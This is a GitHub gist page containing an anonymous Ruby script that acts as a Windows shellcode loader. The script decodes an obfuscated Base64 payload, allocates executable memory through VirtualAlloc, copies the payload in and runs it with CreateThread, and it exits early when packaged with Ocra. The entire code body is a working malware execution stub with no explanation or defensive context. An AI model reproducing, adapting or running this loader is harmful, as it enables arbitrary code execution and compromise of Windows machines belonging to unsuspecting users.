Skip to content

Instantly share code, notes, and snippets.

/ruby.rb Secret

Created September 13, 2015 19:44
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save anonymous/225c0da78687ee31793e to your computer and use it in GitHub Desktop.
Save anonymous/225c0da78687ee31793e to your computer and use it in GitHub Desktop.
Download ZIP
Raw
ruby.rb
require 'rubygems'
require 'win32/api'
require 'base64'
include Win32
exit if Object.const_defined?(:Ocra)
v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')
DUpvguBCJEC = Base64.decode64("XHhiZlx4YmNceGI1XHhhMVx4MzFceGRiXHhkZVx4ZDlceDc0XHgyNFx4ZjRceDVhXHgzM1x4YzlceGIxXHg0Ylx4MzFceDdhXHgxNVx4ODNceGMyXHgwNFx4MDNceDdhXHgxMVx4ZTJceDQ5XHg0OVx4NDlceGIzXHhiMVx4YjJceDhhXHhkNFx4MzhceDU3XHhiYlx4ZDRceDVlXHgxM1x4ZWNceGU0XHgxNVx4NzFceDAxXHg4ZVx4N2JceDYyXHg5Mlx4ZTJceDUzXHg4NVx4MTNceDQ4XHg4NVx4YThceGE0XHhlMVx4ZjVceGFiXHgyNlx4ZjhceDI5XHgwY1x4MTZceDMzXHgzY1x4NGRceDVmXHgyZVx4Y2NceDFmXHgwOFx4MjRceDYyXHhiMFx4M2RceDcwXHhiZVx4M2JceDBkXHg5NFx4YzZceGQ4XHhjNlx4OTdceGU3XHg0ZVx4NWNceGNlXHgyN1x4NzBceGIxXHg3YVx4NmVceDZhXHhkNlx4NDdceDM5XHgwMVx4MmNceDMzXHhiOFx4YzNceDdjXHhiY1x4MTZceDJhXHhiMVx4NGZceDY3XHg2YVx4NzZceGIwXHgxMlx4ODJceDg0XHg0ZFx4MjRceDUxXHhmNlx4ODlceGExXHg0Mlx4NTBceDU5XHgxMVx4YWZceDYwXHg4ZVx4YzdceDI0XHg2ZVx4N2JceDhjXHg2M1x4NzNceDdhXHg0MVx4MThceDhmXHhmN1x4NjRceGNmXHgxOVx4NDNceDQyXHhjYlx4NDJceDE3XHhlYlx4NGFceDJmXHhmNlx4MTRceDhjXHg5MFx4YTdceGIwXHhjNlx4M2RceGIzXHhjOVx4ODRceDI5XHg3MFx4ZTNceDM2XHhhYVx4MWVceDc0XHg0NFx4OThceDgxXHgyZVx4YzJceDkwXHg0YVx4ZThceDE1XHhkNlx4NjBceDRjXHg4OVx4MjlceDhiXHhhY1x4ODNceGVkXHhkZlx4ZmNceGJiXHhjNFx4NWZceDk3XHgzYlx4ZThceGI1XHgzN1x4NmNceDQ2XHg2Nlx4ZjdceGRjXHgyNlx4ZDZceDlmXHgzNlx4YTlceDA5XHhiZlx4MzhceDYzXHgyMlx4NTVceGMyXHhlNFx4ZTFceGI5XHg3NVx4NzlceDkxXHhiYlx4ODVceGEzXHg4MVx4MzJceDYzXHhjOVx4NTVceDEyXHgzYlx4NjZceGNmXHgzZlx4YjdceDE3XHgxMFx4ZWFceGJkXHgxOFx4OWFceDFlXHg0MVx4ZDZceDZiXHg2Ylx4NTFceDBmXHg1NFx4OTNceGE5XHhkMFx4YzFceDkzXHhjM1x4ZDRceDQzXHhjNFx4N2JceGQ3XHhiMlx4MjJceDI0XHgyOFx4OTFceDMxXHgyM1x4ZDZceDY0XHhkY1x4NWZceGUxXHhmMlx4NWVceDA4XHgwZVx4MTNceDVlXHhjOFx4NThceDc5XHg1ZVx4YTBceDNjXHhkOVx4MGRceGQ1XHg0Mlx4ZjRceDIyXHg0Nlx4ZDdceGY3XHgxMlx4M2FceDcwXHg5MFx4OThceDY1XHhiNlx4M2ZceDYzXHg0MFx4YzRceDM4XHg5Ylx4MTVceDA4XHhiOVx4NThceGMwXHg0OFx4Y2ZceGI3XHhkMFx4ZWVceGMwXHhmMlx4NzVceDQ2XHg0Ylx4ZmNceDJhXHg5OFx4NWU=").gsub("\\\\", "\\")
puts DUpvguBCJEC.class
puts DUpvguBCJEC
puts DUpvguBCJEC.length
FjgpufxIVmJhM = v.call(0,(DUpvguBCJEC.length > 0x1000 ? DUpvguBCJEC.length : 0x1000), 0x1000, 0x40)
x = r.call(FjgpufxIVmJhM,DUpvguBCJEC,DUpvguBCJEC.length)
exaxdaBxA = c.call(0,0,FjgpufxIVmJhM,0,0,0)
x = w.call(exaxdaBxA,0xFFFFFFF)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment